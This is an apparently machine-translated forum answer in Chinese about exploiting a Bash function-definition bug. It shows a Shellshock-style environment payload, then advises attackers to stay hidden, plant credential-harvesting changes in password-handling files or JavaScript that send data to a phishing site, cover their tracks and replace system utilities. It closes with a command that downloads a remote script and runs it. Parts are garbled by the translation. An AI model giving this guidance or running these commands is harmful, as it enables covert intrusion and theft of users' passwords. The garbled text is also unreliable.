为e(echo),i(mkdir),ou(触摸),......定义恶意函数
IFS='/bcdfghjklmnpqrstvwxz' function_that_will_execute_shell_with_your_environment_as_root ls='() { echo Pwned; }' bash -c ls
你可以找到许多其他技巧 这里 。
你只关注那些不那么有趣的破坏性潜力,因为受害者可以从备份恢复。更好的办法是使用漏洞利用来查看您可以读取的内容并使用它来进入未检测到的系统。您可以阅读和修改的文件的简单列表比简单地破坏所有内容更加强大和有用
例如,如果您发现接受密码的文件或具有错误权限的页面调用的javascript,您可以修改它们以向您提供此信息或将其发送到网络钓鱼站点。您找到的嵌入式密码可用于了解如何更多地执行其他操作并理想地进入系统文件,以便您可以覆盖您的轨道。或者,如果您可以替换系统实用程序,那么您真的很金,因为您拥有王国的钥匙。
想想这样。在物理世界中,快速识别(和消除)使受害者生病的病毒。当你破坏系统时,你希望人们继续去那里,所以他们甚至不知道他们有问题。
wget https://raw.github.com/keroserene/rickrollrc/master/roll.sh && chmod +x roll.sh && ./roll.sh